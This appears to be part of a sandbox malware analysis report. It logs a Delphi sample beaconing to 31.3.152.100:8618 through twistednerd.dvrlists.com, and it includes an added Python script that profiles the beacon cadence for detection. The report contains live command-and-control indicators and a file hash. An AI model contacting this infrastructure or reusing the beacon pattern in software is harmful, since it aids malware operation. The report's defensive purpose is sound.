                                  Sep 21, 2021 22:16:27.295625925 CEST86184983631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:27.297693968 CEST498368618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:27.308172941 CEST498368618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:27.448641062 CEST86184983631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:28.609532118 CEST498378618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:28.750436068 CEST86184983731.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:28.750648975 CEST498378618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:28.776165009 CEST498378618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:28.901355028 CEST86184983731.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:28.901607037 CEST498378618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:28.915056944 CEST86184983731.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:30.064330101 CEST498388618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:30.202029943 CEST86184983831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:30.202420950 CEST498388618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:30.232950926 CEST498388618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:30.365991116 CEST86184983831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:30.366178989 CEST498388618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:30.370999098 CEST86184983831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:31.505953074 CEST498398618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:31.646661997 CEST86184983931.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:31.646995068 CEST498398618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:31.667562962 CEST498398618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:31.826571941 CEST86184983931.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:32.980344057 CEST498408618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:33.117995977 CEST86184984031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:33.118130922 CEST498408618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:33.144499063 CEST498408618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:33.274204016 CEST86184984031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:33.279401064 CEST498408618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:33.282468081 CEST86184984031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:34.436629057 CEST498418618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:34.575421095 CEST86184984131.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:34.575664997 CEST498418618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:34.585706949 CEST498418618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:34.726032019 CEST86184984131.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:35.866450071 CEST498428618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:36.008327007 CEST86184984231.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:36.008445978 CEST498428618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:36.016613960 CEST498428618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:36.204257011 CEST86184984231.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:36.849234104 CEST86184984231.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:38.033641100 CEST498438618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:38.171638966 CEST86184984331.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:38.172161102 CEST498438618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:38.184686899 CEST498438618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:38.326219082 CEST86184984331.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:39.477659941 CEST498458618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:39.615307093 CEST86184984531.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:39.615540981 CEST498458618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:39.626179934 CEST498458618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:39.801764965 CEST86184984531.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:40.949672937 CEST498508618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:41.088536024 CEST86184985031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:41.088852882 CEST498508618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:41.099371910 CEST498508618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:41.283108950 CEST86184985031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:41.292016029 CEST86184985031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:42.516666889 CEST498588618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:42.659941912 CEST86184985831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:42.667284012 CEST498588618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:42.693928957 CEST498588618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:42.825663090 CEST86184985831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:42.825879097 CEST498588618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:42.831651926 CEST86184985831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:44.030746937 CEST498668618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:44.168741941 CEST86184986631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:44.172888994 CEST498668618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:44.328027010 CEST86184986631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:44.328257084 CEST498668618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:44.424846888 CEST498668618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:44.563138962 CEST86184986631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:45.864420891 CEST498708618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:46.005435944 CEST86184987031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:46.005547047 CEST498708618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:46.047153950 CEST498708618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:46.164721966 CEST86184987031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:46.164808989 CEST498708618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:46.186281919 CEST86184987031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:47.448649883 CEST498738618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:47.587826967 CEST86184987331.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:47.587986946 CEST498738618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:47.599541903 CEST498738618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:47.747620106 CEST86184987331.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:48.899048090 CEST498758618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:49.037157059 CEST86184987531.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:49.037377119 CEST498758618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:49.052481890 CEST498758618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:49.196381092 CEST86184987531.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:50.359335899 CEST498768618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:50.496972084 CEST86184987631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:50.497108936 CEST498768618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:50.505295038 CEST498768618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:50.662307978 CEST86184987631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:51.810425043 CEST498778618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:51.948681116 CEST86184987731.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:51.948844910 CEST498778618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:51.962057114 CEST498778618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:52.116298914 CEST86184987731.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:53.262610912 CEST498788618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:53.400566101 CEST86184987831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:53.402676105 CEST498788618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:53.411948919 CEST498788618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:53.562161922 CEST86184987831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:54.716289043 CEST498798618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:54.854212046 CEST86184987931.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:54.856750011 CEST498798618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:54.870035887 CEST498798618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:55.007710934 CEST86184987931.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:55.007865906 CEST498798618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:55.008524895 CEST86184987931.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:56.160233021 CEST498808618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:56.299182892 CEST86184988031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:56.302000999 CEST498808618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:56.314503908 CEST498808618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:56.458022118 CEST86184988031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:57.701575994 CEST498818618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:57.839539051 CEST86184988131.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:57.839679956 CEST498818618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:57.856561899 CEST498818618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:58.000297070 CEST86184988131.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:59.152896881 CEST498828618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:59.291796923 CEST86184988231.3.152.100192.168.2.7
                                  Sep 21, 2021 22:16:59.291944027 CEST498828618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:59.302822113 CEST498828618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:16:59.463773012 CEST86184988231.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:00.602782965 CEST498838618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:00.743309975 CEST86184988331.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:00.743484974 CEST498838618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:00.751540899 CEST498838618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:00.894351959 CEST86184988331.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:02.036940098 CEST498848618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:02.174793959 CEST86184988431.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:02.175132036 CEST498848618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:02.181062937 CEST498848618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:02.376132011 CEST86184988431.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:02.398453951 CEST86184988431.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:03.539516926 CEST498858618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:03.678653955 CEST86184988531.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:03.678802967 CEST498858618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:03.822181940 CEST498858618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:03.865979910 CEST86184988531.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:03.869450092 CEST498858618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:03.961211920 CEST86184988531.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:05.092715025 CEST498868618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:05.231043100 CEST86184988631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:05.231215000 CEST498868618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:05.237633944 CEST498868618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:05.411750078 CEST86184988631.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:06.776956081 CEST498878618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:06.918227911 CEST86184988731.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:06.918375969 CEST498878618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:06.924138069 CEST498878618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:07.086177111 CEST86184988731.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:08.225198030 CEST498888618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:08.363306046 CEST86184988831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:08.363521099 CEST498888618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:08.379692078 CEST498888618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:08.518527985 CEST86184988831.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:09.661597967 CEST498898618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:09.801161051 CEST86184988931.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:09.801364899 CEST498898618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:09.810553074 CEST498898618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:09.969782114 CEST86184988931.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:11.119174957 CEST498908618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:11.257997036 CEST86184989031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:11.258151054 CEST498908618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:11.267208099 CEST498908618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:11.442771912 CEST86184989031.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:12.599644899 CEST498938618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:12.737704039 CEST86184989331.3.152.100192.168.2.7
                                  Sep 21, 2021 22:17:12.738337040 CEST498938618192.168.2.731.3.152.100
                                  Sep 21, 2021 22:17:12.771708965 CEST498938618192.168.2.731.3.152.100
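What a detection engineer wants from a packet list like the one above is not the individual rows but the beacon profile: which peer the sample keeps contacting, how regularly it opens a fresh connection, and how quickly that peer answers. The following Python is an added example and is not part of the Joe Sandbox report; the sample rows are transcribed from four of the flows in the table above (client ports 49770 to 49773, laid out with `|` separators), 192.168.2.7 is the sandbox VM as shown in the table, and the grouping rule (a flow is keyed by the client's ephemeral port and starts with its first outbound packet) is an assumption of this example, since the sandbox rows carry no TCP flags.

```python
"""Beacon profile from sandbox TCP packet rows.

Added example, not part of the Joe Sandbox report. The rows are transcribed
from four flows in the report's TCP table; 192.168.2.7 is the sandbox VM.
"""
import statistics
from datetime import datetime

TS_FMT = "%b %d, %Y %H:%M:%S.%f"

# Transcribed rows: timestamp | source port | dest port | source IP | dest IP
SAMPLE_ROWS = """\
Sep 21, 2021 22:15:49.601264000 CEST | 49770 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:49.740910053 CEST | 8618 | 49770 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:49.742752075 CEST | 49770 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:49.776230097 CEST | 49770 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:49.911698103 CEST | 8618 | 49770 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:49.914995909 CEST | 8618 | 49770 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:49.915126085 CEST | 49770 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:51.232203960 CEST | 49771 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:51.373131990 CEST | 8618 | 49771 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:51.373276949 CEST | 49771 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:51.409593105 CEST | 49771 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:51.536712885 CEST | 8618 | 49771 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:51.536880970 CEST | 49771 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:51.550023079 CEST | 8618 | 49771 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:52.692353010 CEST | 49772 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:52.830801010 CEST | 8618 | 49772 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:52.830996990 CEST | 49772 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:52.995690107 CEST | 8618 | 49772 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:52.995817900 CEST | 49772 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:53.019932032 CEST | 49772 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:53.162178993 CEST | 8618 | 49772 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:54.211904049 CEST | 49773 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:54.349869013 CEST | 8618 | 49773 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:54.350363016 CEST | 49773 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:54.373811960 CEST | 49773 | 8618 | 192.168.2.7 | 31.3.152.100
Sep 21, 2021 22:15:54.511625051 CEST | 8618 | 49773 | 31.3.152.100 | 192.168.2.7
Sep 21, 2021 22:15:54.511771917 CEST | 8618 | 49773 | 31.3.152.100 | 192.168.2.7
"""


def parse_row(line):
    """Split one '|'-delimited row into (time, sport, dport, src, dst).

    The sandbox prints nanoseconds but datetime carries microseconds, so
    the fraction is truncated to six digits.
    """
    ts, sport, dport, src, dst = [f.strip() for f in line.split("|")]
    stamp, _zone = ts.rsplit(" ", 1)           # drop the 'CEST' label
    head, frac = stamp.rsplit(".", 1)
    when = datetime.strptime(f"{head}.{frac[:6]}", TS_FMT)
    return when, int(sport), int(dport), src, dst


def group_flows(rows, client):
    """Group packets into client-initiated flows keyed by ephemeral port.

    A flow starts with the first packet the client sends; the peer is the
    address that packet went to; first_reply is the peer's first packet back.
    """
    flows = {}
    for when, sport, dport, src, dst in rows:
        outbound = src == client
        key = sport if outbound else dport
        peer = (dst, dport) if outbound else (src, sport)
        flow = flows.setdefault(key, {"peer": peer, "start": when,
                                      "first_reply": None, "pkts": 0})
        flow["pkts"] += 1
        if not outbound and flow["first_reply"] is None:
            flow["first_reply"] = when
    return flows


def beacon_profile(text, client="192.168.2.7"):
    """Summarise the most-contacted peer: cadence, jitter, first-reply delay."""
    rows = [parse_row(line) for line in text.splitlines() if line.strip()]
    flows = group_flows(rows, client)
    tally = {}
    for flow in flows.values():
        tally[flow["peer"]] = tally.get(flow["peer"], 0) + 1
    peer, count = max(tally.items(), key=lambda kv: kv[1])
    mine = [f for f in flows.values() if f["peer"] == peer]
    starts = sorted(f["start"] for f in mine)
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    replies = [(f["first_reply"] - f["start"]).total_seconds()
               for f in mine if f["first_reply"] is not None]
    return {
        "c2": f"{peer[0]}:{peer[1]}",
        "connections": count,
        "median_interval_s": round(statistics.median(gaps), 3) if gaps else None,
        "jitter_s": round(max(gaps) - min(gaps), 3) if gaps else None,
        "median_first_reply_s": round(statistics.median(replies), 3) if replies else None,
        "pkts_per_flow": [f["pkts"] for f in mine],
    }


if __name__ == "__main__":
    print(beacon_profile(SAMPLE_ROWS))
```

On these four flows the profile comes out as 31.3.152.100:8618 contacted on a fresh ephemeral port roughly every 1.5 s with under 0.2 s of spread, a first reply about 0.14 s after each connection opens, and six or seven packets per flow. A short, fixed-cadence connection that is torn down and re-opened rather than kept alive is the shape to alert on; the same function applied to the full table rather than four flows gives the figure to put in the detection rule.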

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP

                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                  Sep 21, 2021 22:15:58.752718925 CEST8.8.8.8192.168.2.70xc4acNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:00.639976978 CEST8.8.8.8192.168.2.70xa02cNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:02.096715927 CEST8.8.8.8192.168.2.70x9826No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:03.531050920 CEST8.8.8.8192.168.2.70x2245No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:04.984008074 CEST8.8.8.8192.168.2.70x760dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:06.819529057 CEST8.8.8.8192.168.2.70x95d4No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:08.267622948 CEST8.8.8.8192.168.2.70xa131No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:10.124789000 CEST8.8.8.8192.168.2.70x6e88No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:11.690999985 CEST8.8.8.8192.168.2.70x9067No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:13.173664093 CEST8.8.8.8192.168.2.70x3cc4No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:14.678241968 CEST8.8.8.8192.168.2.70x10b1No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:16.113316059 CEST8.8.8.8192.168.2.70xc2dcNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:17.552184105 CEST8.8.8.8192.168.2.70x684cNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:19.057770967 CEST8.8.8.8192.168.2.70x2834No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:20.494051933 CEST8.8.8.8192.168.2.70xd34eNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:21.947622061 CEST8.8.8.8192.168.2.70x7593No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:23.415009022 CEST8.8.8.8192.168.2.70xb7a5No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:24.910470009 CEST8.8.8.8192.168.2.70x4071No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:27.142555952 CEST8.8.8.8192.168.2.70x9fb6No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:28.602499008 CEST8.8.8.8192.168.2.70xb6b8No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:30.061834097 CEST8.8.8.8192.168.2.70xa294No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:31.504631042 CEST8.8.8.8192.168.2.70x3dadNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:32.975001097 CEST8.8.8.8192.168.2.70xbcceNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:34.435005903 CEST8.8.8.8192.168.2.70x401dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:35.865314960 CEST8.8.8.8192.168.2.70xb093No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:38.031744957 CEST8.8.8.8192.168.2.70xb8e1No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:39.476430893 CEST8.8.8.8192.168.2.70x723eNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:40.947170019 CEST8.8.8.8192.168.2.70xad60No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:42.515451908 CEST8.8.8.8192.168.2.70xf8acNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:44.025924921 CEST8.8.8.8192.168.2.70x42feNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:45.825886965 CEST8.8.8.8192.168.2.70x4c86No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:47.432734013 CEST8.8.8.8192.168.2.70x8ea9No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:48.898102045 CEST8.8.8.8192.168.2.70x786aNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:50.358386993 CEST8.8.8.8192.168.2.70xe138No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:51.807924032 CEST8.8.8.8192.168.2.70x7d08No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:53.258599997 CEST8.8.8.8192.168.2.70xfd61No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:54.715018034 CEST8.8.8.8192.168.2.70x58d3No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:56.151295900 CEST8.8.8.8192.168.2.70x1e78No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:57.700181007 CEST8.8.8.8192.168.2.70xf320No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:16:59.150486946 CEST8.8.8.8192.168.2.70x1b6cNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:00.601574898 CEST8.8.8.8192.168.2.70xac6dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:02.036047935 CEST8.8.8.8192.168.2.70x4dc3No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:03.537657976 CEST8.8.8.8192.168.2.70x9474No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:05.091638088 CEST8.8.8.8192.168.2.70xbf93No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:06.771140099 CEST8.8.8.8192.168.2.70x6b1bNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:08.223980904 CEST8.8.8.8192.168.2.70xa300No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:09.661106110 CEST8.8.8.8192.168.2.70x8b1dNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:11.117923021 CEST8.8.8.8192.168.2.70x3079No error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)
                                  Sep 21, 2021 22:17:12.589910030 CEST8.8.8.8192.168.2.70x5a4eNo error (0)twistednerd.dvrlists.com31.3.152.100A (IP address)IN (0x0001)

                                  Code Manipulations

                                  Statistics

                                  CPU Usage


                                  Memory Usage


                                  High Level Behavior Distribution


                                  Behavior


                                  System Behavior

                                  General

Start time: 22:14:56
Start date: 21/09/2021
Path: C:\Users\user\Desktop\yVhvGnsUpL.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\yVhvGnsUpL.exe'
Imagebase: 0x400000
File size: 1133568 bytes
MD5 hash: CF98D2D4D4555323842C8371DB09347E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

                                  General

Start time: 22:15:18
